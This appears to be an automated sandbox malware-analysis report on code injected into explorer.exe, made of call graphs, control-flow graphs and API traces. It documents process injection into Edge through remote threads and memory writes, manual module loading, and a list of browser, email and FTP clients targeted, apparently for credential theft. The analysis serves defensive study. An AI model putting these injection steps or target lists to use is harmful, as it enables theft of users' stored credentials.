34a284b 913->914 915 34a1414 914->915 916 34a284f GetProcessHeap HeapFree 914->916 915->820 916->915 918 34a14c0 917->918 919 34a14a1 917->919 921 34a14c8 918->921 922 34a1510 918->922 947 34a17c7 919->947 924 34a17c7 5 API calls 921->924 940 34a14b6 921->940 966 34a26e6 lstrlen lstrlen 922->966 926 34a14e0 924->926 926->940 954 34a1647 926->954 927 34a155f 928 34a26e6 2 API calls 927->928 931 34a156c 928->931 930 34a1532 968 34a1752 GetModuleHandleA GetProcAddress 930->968 933 34a15a0 931->933 934 34a1584 931->934 931->940 938 34a2404 5 API calls 933->938 933->940 971 34a2404 lstrlen 934->971 941 34a15ac 938->941 939 34a1647 11 API calls 939->940 940->830 941->940 942 34a1647 11 API calls 941->942 943 34a14fb 942->943 943->940 977 34a15e0 943->977 944->906 945->908 946->903 948 34a17d1 947->948 949 34a1812 947->949 948->949 950 34a26e6 2 API calls 948->950 949->940 951 34a17f1 950->951 951->949 982 34a2861 GetProcessHeap RtlAllocateHeap 951->982 953 34a1804 RtlMoveMemory 953->949 955 34a1660 954->955 965 34a1745 954->965 956 34a1671 lstrlen 955->956 955->965 957 34a1683 lstrlen 956->957 956->965 958 34a1690 getpeername 957->958 957->965 959 34a16ae inet_ntoa htons 958->959 958->965 960 34a16cc 959->960 959->965 960->965 983 34a2861 GetProcessHeap RtlAllocateHeap 960->983 962 34a1717 wsprintfA 963 34a173a 962->963 964 34a2843 3 API calls 963->964 963->965 964->965 965->943 967 34a151d 966->967 967->927 967->930 969 34a1539 968->969 970 34a1776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 968->970 969->939 969->940 970->969 972 34a241c CryptStringToBinaryA 971->972 973 34a2456 971->973 972->973 974 34a2438 972->974 973->940 984 34a2861 GetProcessHeap RtlAllocateHeap 974->984 976 34a2444 CryptStringToBinaryA 976->973 978 34a2843 3 API calls 977->978 979 34a15f5 978->979 980 34a2843 3 API calls 979->980 981 34a15fc 980->981 981->940 982->953 983->962 984->976 998 34a2806 VirtualFree 999 34a1eb6 1000 34a1ed9 999->1000 1001 34a1ecc lstrlen 999->1001 1010 34a2861 GetProcessHeap RtlAllocateHeap 1000->1010 1001->1000 1003 34a1ee1 lstrcat 1004 34a1f1d 1003->1004 1005 34a1f16 lstrcat 1003->1005 1011 34a1f4a 1004->1011 1005->1004 1008 34a2843 3 API calls 1009 34a1f40 1008->1009 1010->1003 1045 34a22b8 1011->1045 1015 34a1f77 1050 34a27e2 lstrlen MultiByteToWideChar 1015->1050 1017 34a1f86 1051 34a2374 RtlZeroMemory 1017->1051 1020 34a1fd8 RtlZeroMemory 1022 34a200d 1020->1022 1021 34a2843 3 API calls 1023 34a1f2d 1021->1023 1026 34a229a 1022->1026 1028 34a203b 1022->1028 1053 34a22e5 1022->1053 1023->1008 1025 34a2280 1025->1026 1027 34a2843 3 API calls 1025->1027 1026->1021 1027->1026 1028->1025 1062 34a2861 GetProcessHeap RtlAllocateHeap 1028->1062 1030 34a210b wsprintfW 1031 34a2131 1030->1031 1035 34a219e 1031->1035 1063 34a2861 GetProcessHeap RtlAllocateHeap 1031->1063 1033 34a216b wsprintfW 1033->1035 1034 34a225d 1036 34a2843 3 API calls 1034->1036 1035->1034 1064 34a2861 GetProcessHeap RtlAllocateHeap 1035->1064 1037 34a2271 1036->1037 1037->1025 1039 34a2843 3 API calls 1037->1039 1039->1025 1040 34a21e9 1041 34a2256 1040->1041 1065 34a2815 VirtualAlloc 1040->1065 1043 34a2843 3 API calls 1041->1043 1043->1034 1044 34a2243 RtlMoveMemory 1044->1041 1046 34a22c2 1045->1046 1047 34a1f69 1045->1047 1048 34a26e6 2 API calls 1046->1048 1049 34a2861 GetProcessHeap RtlAllocateHeap 1047->1049 1048->1047 1049->1015 1050->1017 1052 34a1f96 1051->1052 1052->1020 1052->1026 1054 34a2353 1053->1054 1056 34a22f2 1053->1056 1054->1028 1055 34a22f6 DnsQuery_W 1055->1056 1056->1054 1056->1055 1057 34a2335 DnsFree inet_ntoa 1056->1057 1057->1056 1058 34a2355 1057->1058 1066 34a2861 GetProcessHeap RtlAllocateHeap 1058->1066 1060 34a235f 1067 34a27e2 lstrlen MultiByteToWideChar 1060->1067 1062->1030 1063->1033 1064->1040 1065->1044 1066->1060 1067->1054 1068 34a1425 1069 34a1432 1068->1069 1071 34a144b 1068->1071 1070 34a2608 VirtualQuery 1069->1070 1072 34a143a 1070->1072 1072->1071 1073 34a1493 23 API calls 1072->1073 1073->1071

                                                                                                                              Callgraph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Opacity -> Relevance
                                                                                                                              • Disassembly available
                                                                                                                              callgraph 0 Function_034A1F4A 2 Function_034A2843 0->2 24 Function_034A2815 0->24 29 Function_034A27E2 0->29 32 Function_034A2861 0->32 36 Function_034A22E5 0->36 37 Function_034A22B8 0->37 41 Function_034A2731 0->41 43 Function_034A2374 0->43 1 Function_034A2608 2->1 3 Function_034A1A80 4 Function_034A1DC0 13 Function_034A1C19 4->13 5 Function_034A1D80 5->13 6 Function_034A1000 20 Function_034A1016 6->20 7 Function_034A2840 8 Function_034A2806 9 Function_034A1647 9->2 27 Function_034A24AE 9->27 9->32 10 Function_034A17C7 10->32 33 Function_034A26E6 10->33 11 Function_034A2404 11->32 12 Function_034A1819 12->1 12->3 21 Function_034A1B17 12->21 14 Function_034A245E 14->32 15 Function_034A1E5D 15->5 16 Function_034A2592 17 Function_034A1752 18 Function_034A1493 18->9 18->10 18->11 18->17 31 Function_034A15E0 18->31 18->33 19 Function_034A1E93 20->1 20->12 20->16 28 Function_034A25AD 20->28 20->32 34 Function_034A10A4 20->34 39 Function_034A1332 20->39 40 Function_034A2573 20->40 20->41 22 Function_034A3417 23 Function_034A24D5 25 Function_034A7728 26 Function_034A1469 26->1 26->18 30 Function_034A1DE3 30->4 30->15 30->19 30->24 31->2 34->1 34->12 34->16 34->28 34->32 34->40 34->41 35 Function_034A1425 35->1 35->18 36->29 36->32 37->33 38 Function_034A263E 39->1 39->2 39->18 39->23 39->30 39->32 39->38 42 Function_034A1EB6 42->0 42->2 42->32

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 34a1016-34a1020 call 34a2608 3 34a1022-34a104b call 34a2861 RtlMoveMemory 0->3 4 34a1097-34a1098 0->4 7 34a104d-34a106b call 34a2861 RtlMoveMemory 3->7 8 34a1071-34a1090 NtUnmapViewOfSection GetCurrentProcessId 3->8 7->8 10 34a109e-34a10d7 call 34a10a4 call 34a2861 8->10 11 34a1092-34a1093 8->11 21 34a10dc-34a10ea CreateToolhelp32Snapshot 10->21 11->4 13 34a1095-34a1099 call 34a1332 11->13 13->10 22 34a1322-34a132d Sleep 21->22 23 34a10f0-34a1106 Process32First 21->23 22->21 24 34a131b-34a131c CloseHandle 23->24 25 34a110c-34a111e lstrcmpiA 23->25 24->22 26 34a1280-34a1289 call 34a25ad 25->26 27 34a1124-34a1132 lstrcmpiA 25->27 33 34a128b-34a1294 call 34a2592 26->33 34 34a1305-34a1313 Process32Next 26->34 27->26 28 34a1138-34a1146 lstrcmpiA 27->28 28->26 30 34a114c-34a115a lstrcmpiA 28->30 30->26 32 34a1160-34a116a lstrcmpiA 30->32 32->26 35 34a1170-34a117e lstrcmpiA 32->35 33->34 41 34a1296-34a129d call 34a2573 33->41 34->25 36 34a1319 34->36 35->26 38 34a1184-34a1192 lstrcmpiA 35->38 36->24 38->26 40 34a1198-34a11a6 lstrcmpiA 38->40 40->26 42 34a11ac-34a11ba lstrcmpiA 40->42 41->34 47 34a129f-34a12ac call 34a2608 41->47 42->26 44 34a11c0-34a11ce lstrcmpiA 42->44 44->26 46 34a11d4-34a11e2 lstrcmpiA 44->46 46->26 48 34a11e8-34a11f6 lstrcmpiA 46->48 47->34 52 34a12ae-34a1300 lstrcmpiA call 34a2731 call 34a1819 call 34a2731 47->52 48->26 51 34a11fc-34a120a lstrcmpiA 48->51 51->26 53 34a120c-34a121a lstrcmpiA 51->53 52->34 53->26 55 34a121c-34a122a lstrcmpiA 53->55 55->26 56 34a122c-34a123a lstrcmpiA 55->56 56->26 58 34a123c-34a124a lstrcmpiA 56->58 58->26 60 34a124c-34a125a lstrcmpiA 58->60 60->26 62 34a125c-34a126a lstrcmpiA 60->62 62->26 64 34a126c-34a127a lstrcmpiA 62->64 64->26 64->34
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 034A2608: VirtualQuery.KERNEL32(034A4434,?,0000001C), ref: 034A2615
                                                                                                                                • Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
                                                                                                                                • Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 034A1038
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 034A106B
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 034A1074
                                                                                                                              • GetCurrentProcessId.KERNEL32(?,034A1010), ref: 034A107A
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034A10DF
                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 034A10FE
                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 034A111A
                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 034A112E
                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 034A1142
                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 034A1156
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A1166
                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 034A117A
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 034A118E
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 034A11A2
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 034A11B6
                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 034A11CA
                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 034A11DE
                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 034A11F2
                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 034A1206
                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 034A1216
                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 034A1226
                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 034A1236
                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 034A1246
                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 034A1256
                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 034A1266
                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 034A1276
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A12B4
                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 034A130B
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 034A131C
                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 034A1327
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                              • API String ID: 2555639992-1680033604
                                                                                                                              • Opcode ID: afed492053cd522b9afe71347bf2c654f520f5f60312b61268479a069dde4066
                                                                                                                              • Instruction ID: 260758889674d7e68a753f1e38de4696e004323b3558082905965e7e9c0e85f6
                                                                                                                              • Opcode Fuzzy Hash: afed492053cd522b9afe71347bf2c654f520f5f60312b61268479a069dde4066
                                                                                                                              • Instruction Fuzzy Hash: 29719739505B05ABD700EF7A9C44EAFBBEC6B65680F08092FF940DE245EB60D5058B68

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
                                                                                                                                • Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034A10DF
                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 034A10FE
                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 034A111A
                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 034A112E
                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 034A1142
                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 034A1156
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A1166
                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 034A117A
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 034A118E
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 034A11A2
                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 034A11B6
                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 034A11CA
                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 034A11DE
                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 034A11F2
                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 034A1206
                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 034A1216
                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 034A1226
                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 034A1236
                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 034A1246
                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 034A1256
                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 034A1266
                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 034A1276
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A12B4
                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 034A130B
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 034A131C
                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 034A1327
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                              • API String ID: 3950187957-1680033604
                                                                                                                              • Opcode ID: b9ef6402ce35b9e2c8939ce6cd272994398ec1dff8c4f6963e78550a967d19f1
                                                                                                                              • Instruction ID: 1afe79fa2dc030064edce96f75f34de16107a51cce21a0b29bdaf8ff24634070
                                                                                                                              • Opcode Fuzzy Hash: b9ef6402ce35b9e2c8939ce6cd272994398ec1dff8c4f6963e78550a967d19f1
                                                                                                                              • Instruction Fuzzy Hash: DE51B835605B05AADB00EEB98C45E6FBBEC6F65680F0C092FF940EE245EB60D5058B7D

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 112 34a7728-34a7745 113 34a774b-34a7758 112->113 114 34a790d 112->114 115 34a776a-34a776f 113->115 114->114 116 34a7771 115->116 117 34a7773 116->117 118 34a7760-34a7765 116->118 120 34a7778-34a777a 117->120 119 34a7766-34a7768 118->119 119->115 119->116 121 34a777c-34a7781 120->121 122 34a7783-34a7787 120->122 121->122 122->120 123 34a7789 122->123 124 34a778b-34a7792 123->124 125 34a7794-34a7799 123->125 124->120 124->125 126 34a779b-34a77a4 125->126 127 34a77a8-34a77aa 125->127 128 34a781a-34a781d 126->128 129 34a77a6 126->129 130 34a77ac-34a77b1 127->130 131 34a77b3-34a77b7 127->131 134 34a7822-34a7825 128->134 129->127 130->131 132 34a77b9-34a77be 131->132 133 34a77c0-34a77c2 131->133 132->133 136 34a77e4-34a77f3 133->136 137 34a77c4 133->137 135 34a7827-34a7829 134->135 135->134 138 34a782b-34a782e 135->138 140 34a7804-34a7811 136->140 141 34a77f5-34a77fc 136->141 139 34a77c5-34a77c7 137->139 138->134 142 34a7830-34a784c 138->142 143 34a77c9-34a77ce 139->143 144 34a77d0-34a77d4 139->144 140->140 146 34a7813-34a7815 140->146 141->141 145 34a77fe 141->145 142->135 147 34a784e 142->147 143->144 144->139 148 34a77d6 144->148 145->119 146->119 149 34a7854-34a7858 147->149 150 34a77d8-34a77df 148->150 151 34a77e1 148->151 152 34a785a-34a7870 LoadLibraryA 149->152 153 34a789f-34a78a2 149->153 150->139 150->151 151->136 154 34a7871-34a7876 152->154 155 34a78a5-34a78ac 153->155 154->149 156 34a7878-34a787a 154->156 157 34a78ae-34a78b0 155->157 158 34a78d0-34a7900 VirtualProtect * 2 155->158 160 34a787c-34a7882 156->160 161 34a7883-34a7890 GetProcAddress 156->161 162 34a78b2-34a78c1 157->162 163 34a78c3-34a78ce 157->163 159 34a7904-34a7908 158->159 159->159 164 34a790a 159->164 160->161 165 34a7899-34a789c 161->165 166 34a7892-34a7897 161->166 162->155 163->162 164->114 166->154
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A6000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A6000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a6000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 47475e8a0d2230fd67fa860eb5ae9145b52022901dc1742ef55cbc3d7c1f2ebe
                                                                                                                              • Instruction ID: a13c607c009881bbf893c21b6abb73aa91912381739ac3051e5407e881449c9c
                                                                                                                              • Opcode Fuzzy Hash: 47475e8a0d2230fd67fa860eb5ae9145b52022901dc1742ef55cbc3d7c1f2ebe
                                                                                                                              • Instruction Fuzzy Hash: AD510975948B514ED731CABCCC806A2BFA4DB52221B1D06BFC5E5CF3C2E6946806C7A8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 167 34a2861-34a2871 GetProcessHeap RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 034A286B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1357844191-0
                                                                                                                              • Opcode ID: 6a569aa98bbe44d98379805524a24d7dabb825f7f3654da1bfcfa9c2b66380c8
                                                                                                                              • Instruction ID: c028da2f56c152f8a112d5a437fd2265220500c92d35ffd5d89af8507a74fe27
                                                                                                                              • Opcode Fuzzy Hash: 6a569aa98bbe44d98379805524a24d7dabb825f7f3654da1bfcfa9c2b66380c8
                                                                                                                              • Instruction Fuzzy Hash: 50A012748045007FDD403FA0A80DF073E98A740301F0000407189DC04CA960004C9721

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 034A2608: VirtualQuery.KERNEL32(034A4434,?,0000001C), ref: 034A2615
                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 034A184E
                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 034A1889
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 034A1919
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,034A3428,00000016), ref: 034A1940
                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 034A1968
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 034A1978
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 034A1992
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 034A199A
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A19A8
                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A19AF
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 034A19C5
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 034A19CC
                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A19E2
                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A1A0C
                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 034A1A1F
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A26
                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A2D
                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A1A41
                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 034A1A58
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A65
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A6B
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A71
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 034A1A74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                              • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                              • API String ID: 1066286714-4141090125
                                                                                                                              • Opcode ID: f2e91ceb3539260aa7fb399cff5b27f708ecd11fa2bee837980d6a7f51558aa8
                                                                                                                              • Instruction ID: bb6f2995821048956ccac2243c660d269de810221ebe622819e5078d0b861c19
                                                                                                                              • Opcode Fuzzy Hash: f2e91ceb3539260aa7fb399cff5b27f708ecd11fa2bee837980d6a7f51558aa8
                                                                                                                              • Instruction Fuzzy Hash: C361BF75608B04AFD310EF69DC44E6BBFECEF98654F04051AF989EB244E770D9048B65

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 034A265A
                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 034A2672
                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 034A267A
                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 034A2685
                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 034A269F
                                                                                                                              • wsprintfA.USER32 ref: 034A26B6
                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 034A26CF
                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 034A26D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                              • String ID: %02X
                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                              • Opcode ID: 0b33fb70e941364a5c11fe9cee9712b07d7112d3f124d0a4d83c666b2a54ec31
                                                                                                                              • Instruction ID: bf9d6f1d7bb9fa84e4aaa8a3a999c0e6753da22d17aeb5f867c5098614e2bc34
                                                                                                                              • Opcode Fuzzy Hash: 0b33fb70e941364a5c11fe9cee9712b07d7112d3f124d0a4d83c666b2a54ec31
                                                                                                                              • Instruction Fuzzy Hash: A211BFB590040CBFEB10AF99EC88EAFBFBCEB48300F104062F641E6108E7704E00AB20

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 421 34a1b17-34a1b2c 422 34a1b2e 421->422 423 34a1b60-34a1b68 421->423 424 34a1b30-34a1b5e RtlMoveMemory 422->424 425 34a1b6a-34a1b6f 423->425 426 34a1bc3-34a1bcb 423->426 424->423 424->424 427 34a1bbe-34a1bc1 425->427 428 34a1c0b 426->428 429 34a1bcd-34a1bdf 426->429 427->426 431 34a1b71-34a1b84 LoadLibraryA 427->431 430 34a1c0d-34a1c12 428->430 429->428 432 34a1be1-34a1bfe LdrProcessRelocationBlock 429->432 433 34a1b8a-34a1b8f 431->433 434 34a1c15-34a1c17 431->434 432->428 435 34a1c00-34a1c04 432->435 436 34a1bb6-34a1bb9 433->436 434->430 435->428 437 34a1c06-34a1c09 435->437 438 34a1bbb 436->438 439 34a1b91-34a1b95 436->439 437->428 437->432 438->427 440 34a1b9c-34a1b9f 439->440 441 34a1b97-34a1b9a 439->441 442 34a1ba1-34a1bab GetProcAddress 440->442 441->442 442->434 443 34a1bad-34a1bb3 442->443 443->436
                                                                                                                              APIs
                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 034A1B4E
                                                                                                                              • LoadLibraryA.KERNEL32(?,034A4434,00000000,00000000,74DF2EE0,00000000,034A1910,?,?,?,00000001,?,00000000), ref: 034A1B76
                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 034A1BA3
                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 034A1BF4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3827878703-0
                                                                                                                              • Opcode ID: 3b395db18818814cc4b3f7321076931e2da4dd690e5eeb6cd2c494ad3e5a5775
                                                                                                                              • Instruction ID: c1dbfac9afb9271a37e85cd5030fed500a5a1c56828c5eddf4d9de1a76490170
                                                                                                                              • Opcode Fuzzy Hash: 3b395db18818814cc4b3f7321076931e2da4dd690e5eeb6cd2c494ad3e5a5775
                                                                                                                              • Instruction Fuzzy Hash: A931A475700A01ABCB24CE2DC985B66B7E8EF25315F08456EE896CF301E731E845CBA8

                                                                                                                              Control-flow Graph

